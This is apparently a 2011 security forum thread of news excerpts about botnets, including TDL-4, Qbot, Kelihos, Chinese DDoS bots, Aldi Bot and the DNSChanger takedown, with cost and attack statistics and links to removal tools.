Pandemic of the botnets 2011

[AplusWebMaster]

FYI...

TDL-4 botnet - 4.5 million...
- https://www.computerworld.com/s/arti...7&pageNumber=2
June 29, 2011 - "... Kaspersky* estimated that the TDL-4 botnet consists of more than 4.5 million infected Windows PCs. TDL-4's rootkit, encryption and communication practices, as well as its ability to disable other malware, including the well-known Zeus, makes the botnet extremely durable... TDL-4's counter-attacks against other malware was another reason it's so successful... TDL-4's makers use the botnet to plant additional malware on PCs, rent it out to others for that purpose and for distributed denial-of-service (DDoS) attacks, and to conduct spam and phishing campaigns. Kaspersky said TDL-4 has installed nearly 30 different malicious programs on the PCs it controls..."
* http://www.securelist.com/en/analysi...0/TDL4_Top_Bot

- http://www.securelist.com/en/analysi...7/TDSS_TDL_4#7
"... TDSSKiller*... detects not only the latest variant of the malware, but its previous versions as well..."
* http://support.kaspersky.com/faq?cha...&qid=208283363

- http://isc.sans.org/diary.html?storyid=11146
Last Updated: 2011-07-03 00:29:34 UTC

[AplusWebMaster]

FYI...

Blended attacks hit more Websites
- http://www.informationweek.com/news/...ndly=this-page
July 25, 2011 - "The average large business's website sees 27 attacks per minute, though attackers - thanks to automation - can create spikes of up to seven attacks per second, or about 25,000 attacks per hour. Those findings come from a new study, conducted by Imperva, of more than 10 million Web application attacks targeting the websites of 30 large businesses and government agencies, launched between January 2011 to May 2011. The study also assessed traffic that flowed via the onion router, better known as TOR, which helps anonymize Web traffic. The study found that the four most prevalent attacks against Web applications were directory traversal (37%), cross site scripting (36%), SQL injection (23%), and remote file include (4%), aka RFI. Attackers often employed those techniques in combination, whether to steal data, surreptitiously install malware on servers, or simply create a denial of service... Overall, most Web application attacks are launched from botnets* involving exploited PCs located in the United States (for 61% of attacks), followed by China (9%), Sweden (4%), and France (2%). But the identity of whoever's behind those attacks, and where they might be based, isn't clear..."
* http://blog.imperva.com/2011/07/web-...o-minutes.html
July 25, 2011

[AplusWebMaster]

FYI...

Cybercrime more costly, more frequent ...
- http://www.darkreading.com/taxonomy/...e/id/231300021
Aug 02, 2011 - "Cybercrime is not only becoming more frequent - it's becoming more expensive for the victims... In its Second Annual Cost of Cybercrime study*, the Ponemon Institute surveyed 50 large companies to determine the losses and expenditures caused by cybercrime. The study, sponsored by security information and event management company HP ArcSight, indicates that the cost of cybercrime has risen 56 percent since last year's report. "We found that the median annualized cost of cybercrime for 50 organizations in our study is $5.9 million per year, with a range of $1.5 million to $36.5 million each year per company," the study says. Some of the other findings:
• Cybercrime cost varies by organizational size... smaller organizations incur a significantly higher per capita cost than larger-sized organizations ($1,088 vs. $284).
• The companies participating in the study experienced 72 successful attacks per week - or more than 1.4 successful attacks per organization. This figure has increased 44 percent over last year...
• The most costly cybercrimes are those caused by malicious code, denial-of-service, stolen or hijacked devices, and malicious insiders... These account for more than 90 percent of all cybercrime costs...
• Cyberattacks can get costly if not resolved quickly... The average time to resolve a cyberattack is 18 days, with an average cost of $415,748 over this 18-day period... a 67 percent increase from last year’s estimated average cost of $247,744...
• Results show that malicious insider attacks can take more than 45 days on average to contain... Information theft accounts for 40 percent of total external costs... disruption to business or lost productivity account for 28 percent of external costs...
• Recovery and detection are the most costly internal activities associated with cybercrime... Recovery and detection account for 45 percent of the total internal activity cost, most of it spent on cash outlays and labor. Having an SIEM system** can help..."
* http://www.arcsight.com/press/releas...earch-ponemon/

** https://secure.wikimedia.org/wikipedia/en/wiki/SIEM

[AplusWebMaster]

FYI...

Bitcoin mining bot... controlled via Twitter
- http://www.f-secure.com/weblog/archives/00002207.html
August 2, 2011 - "Bitcoin is an electronic currency which is not tied in value to any other currencies. You can convert other currencies (like US dollars) to Bitcoins, or you can mine new Bitcoins by completing complex mathematical tasks. This creates an incentive for botnet masters to use other people's computers to mine bitcoins for them. And we've seen a some examples of botnets that try to do this. But now we've found a bot that uses Twitter as the control channel. The bots are created with a generator. Generator sets a specific Twitter account to be the one which can be used to control the mining botnet... We detect bots generated with this generator as Trojan.Generic.KD."

[AplusWebMaster]

FYI...

Botnet-driven "Google Dorks" - automated cyber attacks...
- http://venturebeat.com/2011/08/16/wa...cyber-attacks/
August 16, 2011 - "... swarms of compromised computers are being unleashed for the first time on an old kind of vulnerability: Google Dorks. Google Dorks have been around for a while, as the name for an attack where hackers scan web sites, using commonly used links within company networks, to see if there are any unsecure links that can be used to break into a company’s web site. A report being released today by Imperva* warns that the combination of the highly automated botnets and the Google Dorks are a new vector for hackers to break into companies on a massive scale... The botnets can be used with a distributed search tool to find distinguishable resource names and specific error messages that say more than they should. Dorks are often exchanged between hackers in forums. Some of the lists of Dorks are posted on various web sites. Dorks and exploits go hand in hand. In the attack that Imperva observed, the attackers used dorks that match vulnerable web applications and search operators that were tailored to a specific search engine. For each unique search query, the botnet examined hundreds of returned results. Full told, the number of queries topped 550,000 queries, including one day with 81,000 queries — all via a single botnet. The attackers targeted e-commerce sites and content management systems. The more success they had, the more the attackers refined their search terms. Imperva saw 4,719 different variations of dorks used in the attacks. Fortunately, there are some solutions that Google, Bing and Yahoo can use to protect against these attacks. Search engines are in a unique position to identify botnets that abuse their services and can thus find out more about the attackers. The search engines can identify unusual queries such as those that contain terms from publicly available Dork databases, or queries that look for sensitive files..."
* http://blog.imperva.com/2011/08/google-dorks-20.html
August 16, 2011
___

- http://www.darkreading.com/taxonomy/...e/id/231500104
Aug 16, 2011

[AplusWebMaster]

FYI...

Rent-a-Bots tied to TDSS Botnet
- https://krebsonsecurity.com/2011/09/...o-tdss-botnet/
September 6, 2011 - "... one of the world’s largest and most sophisticated botnets is openly renting its infected PCs to any and all comers, and has even created a Firefox add-on to assist customers. The TDSS botnet is the most sophisticated threat today... First launched in 2008, TDSS is now in its fourth major version (also known as TDL-4). The malware uses a “rootkit” to install itself deep within infected PCs, ensuring that it loads before the Microsoft Windows operating system starts. TDSS also removes approximately 20 malicious programs from host PCs, preventing systems from communicating with other bot families... when socks.dll is installed on a TDSS-infected computer, it notifies awmproxy .net that a new proxy is available for rent. Soon after that notification is completed, the infected PC starts to accept approximately 10 proxy requests each minute... The service’s proxies are priced according to exclusivity and length of use... The renting of hacked PCs for anonymous surfing is only one of the many ways the TDSS authors monetize their botnet..."
(More detail at the krebsonsecurity URL above.)

Some Botnet Statistics ...
> http://www.abuse.ch/?p=3294

[AplusWebMaster]

FYI...

Qbot now Digitally Signed ...
- http://blog.eset.com/2011/09/07/back...gitally-signed
September 7, 2011 - "... Win32/Qbot (a.k.a. Qakbot) are back with new variants of this infamous malware, and this time the binaries are digitally signed. Qbot is a multifunctional trojan that has had some significant impact in the past. It has also been around a while, with the first variants dating as far back as spring 2007, with more massive distribution starting two years later in 2009... Two weeks ago we caught the latest version with our advanced heuristics... the code of this Qbot version has been rewritten, but the functionality remains very similar to the previous versions. As a reminder, Qbot’s main purpose is stealing different types of sensitive information, including:
• Various user names and passwords
• Keystrokes
• Cookies
• Digital certificates
• Visited URLs
• And much more...
It features a backdoor, which enables the bot to be controlled remotely, update itself, download and run other executables on the infected system. It can also insert malicious IFRAME tags into webpages, has the possibility to block access to domains containing certain keywords (which it uses as an anti-AV feature), and can be used for man-in-the-middle attacks against victims’ online banking systems. Win32/Qbot uses rootkit techniques to hide its presence in the operating system and also has characteristics of a worm, as it can spread through network shares and removable drives..."
(Screenshots and more detail available at the eset URL above.)

[AplusWebMaster]

FYI...

Kelihos botnet shutdown
- https://www.computerworld.com/s/arti...s_off_a_botnet
September 27, 2011 - "Microsoft has opened a front in its ongoing battle against Internet scammers, using the power of a U.S. court to deal a knockout blow to an emerging botnet and taking offline a provider of free Internet domains. Microsoft used the same technique that worked in its earlier takedowns of the Rustock and Waledac botnets, asking a U.S. court to order Verisign to shut down 21 Internet domains associated with the command-and-control servers that form the brains of the Kelihos botnet... With somewhere between 42,000 and 45,000 infected computers, Kelihos is a small botnet. But, it was spewing out just under 4 billion spam messages per day - junk mail related to stock scams, pornography, illegal pharmaceuticals and malicious software..."

Operation b79 (Kelihos) and Additional MSRT September Release
- https://blogs.technet.com/b/mmpc/arc...r-release.aspx
26 Sep 2011

[AplusWebMaster]

FYI...

Chinese DDoS malware
- http://asert.arbornetworks.com/2011/...bulletin-2011/
October 5th, 2011 - "... Our malware stream contains a lot of DDoS bots, many from China*..."
* http://www.securelist.com/en/blog/20...nese_DDoS_Bots
"... Over 40 families of Chinese DDoS bots were identified by Arbor Networks and have been tracked over the past year. Online occurance of the malware itself is increasing. A ton of these families are cropping up all the time, at least a new one every week appears with an unusual new capability... it is difficult to understand or even speculate what the motivation behind the attack may be. Most of the code base is shared, cobbled together, and generally was thrown together by inexperienced writers... One of these familes represents the "typical" Chinese DDoS bot: darkshell is a great example of the rudimentary and simple level of network traffic obfuscation, but it's as sophisticated as it gets for these families... The bots use a very basic installation to Windows service and some use http, but most use raw tcp connections to their command and control (CnC) servers residing at 3322 .org or 8866 .org free dynamic dns providers' domains... The Chinese DDoS attack engines that make these bot families unique from other regional bots is the very large set of DDoS attack capabilities maintained in each. Winsock2-based HTTP flood capabilities were the most common or the bots' DDoS capabilities and are used to take down web sites, followed by UDP, TCP and ICMP flood capabilities...yoyoddos is the most active of the DDoS families that they are tracking. The family also maintains the first spot as sustaining the longest attack against a site of these CN DDoS families. This one launched a particular attack for 45 days straight... Chinese web sites are not the only recipients of the DDoS attacks. jkddos tends to go after large, very prominent, financial and investment companies. On 6 different occasions the family was used to DDoS a very large and prominent NYC commercial real estate holding company, and its longest attack was 33 hours. It's a new and somewhat unexpected area of bad online behavior."

> http://google.com/safebrowsing/diagn...site=3322.org/
"... Part of this site was listed for suspicious activity 23 time(s) over the past 90 days... Malicious software includes 2040 exploit(s), 1341 trojan(s), 145 backdoor(s)... this site has hosted malicious software over the past 90 days. It infected 254 domain(s)..."
> http://google.com/safebrowsing/diagn...site=8866.org/
"... Part of this site was listed for suspicious activity 8 time(s) over the past 90 days... Malicious software includes 162 exploit(s), 77 scripting exploit(s), 38 trojan(s)... this site has hosted malicious software over the past 90 days. It infected 133 domain(s)..."
___

Aldi Bot...
- http://asert.arbornetworks.com/2011/10/ddos-aldi-bot/
October 5th, 2011 - "... Aldi Bot is a newer inexpensive DDoS bot that is growing in popularity. Recent data (September 30 2011) suggests that there are at least 50 distinct Aldi bot binaries that have been seen in the wild with 44 unique Command & Control points. We see the bot active in Russia, the Ukraine, the US, and Germany. While it has been stated that Aldi Bot won’t be developed further, the source code has leaked which makes it easy to find and use... All it takes is one bot such as Aldi Bot or other tool such as a Remote Access Trojan (RAT) to provide an attacker a handhold on the inside of an organization that can lead to a much larger security breach... attacks involving the exfiltration of sensitive data typically start with one smaller compromise that is then leveraged for additional access. Additionally Aldi Bot steals passwords, and passwords are often re-used for convenience even though it is a dangerous practice. Without proper monitoring of system and network activity, such infected nodes can be long-lived and pose significant risk... While it has been speculated that Aldi Bot has borrowed from the Zeus banking Trojan source code release in early 2011, Aldi bot is written in Delphi with a PHP back-end, while Zeus is written in C++ with PHP on the back-end. The only obvious similarity between Zeus and Aldi Bot that I can see at first glance is that both of them tend to use a filename called gate.php on the web-based back-end as a “drop zone” to process stolen data."
- http://www.h-online.com/security/new...ew=zoom;zoom=2

[AplusWebMaster]

FYI...

Biggest Cybercriminal Takedown in History
- http://blog.trendmicro.com/esthost-t...wn-in-history/
Nov. 9, 2011 - "... a long-living botnet of more than 4,000,000 bots was taken down by the FBI* and Estonian police in cooperation with Trend Micro and a number of other industry partners... The botnet consisted of infected computers whose Domain Name Server (DNS) settings were -changed- to point to foreign IP addresses. DNS servers resolve human readable domain names to IP addresses that are assigned to computer servers on the Internet. Most Internet users automatically use the DNS servers of their Internet Service Provider.... a collaboration also led to the arrest of the bad actors responsible for the botnet, despite the fact that the takedown of Rove Digital was complicated and took a lot of effort... Other industry partners did a tremendous job by making sure that the takedown of the botnet happened in a controlled way, with minimal inconvenience for the infected customers..."

* http://www.fbi.gov/news/stories/2011...malware_110911
11/09/11 - "Six Estonian nationals have been arrested and charged with running a sophisticated Internet fraud ring that infected millions of computers worldwide with a virus and enabled the thieves to manipulate the multi-billion-dollar Internet advertising industry. Users of infected machines were unaware that their computers had been compromised—or that the malicious software rendered their machines vulnerable to a host of other viruses... DNSChanger was used to redirect unsuspecting users to rogue servers controlled by the cyber thieves, allowing them to manipulate users’ web activity..."
> (More detail at the FBI URL above.)
> http://www.fbi.gov/news/stories/2011...alware-graphic

Video: http://www.symantec.com/avcenter/ref...animation.html

- https://krebsonsecurity.com/2011/11/...ed-in-estonia/
Nov. 9, 2011
___

- https://www.us-cert.gov/current/#ope..._click_malware
November 10, 2011
___

How to check if you are a victim...
> http://countermeasures.trendmicro.eu...n-ghost-click/
Nov. 9, 2011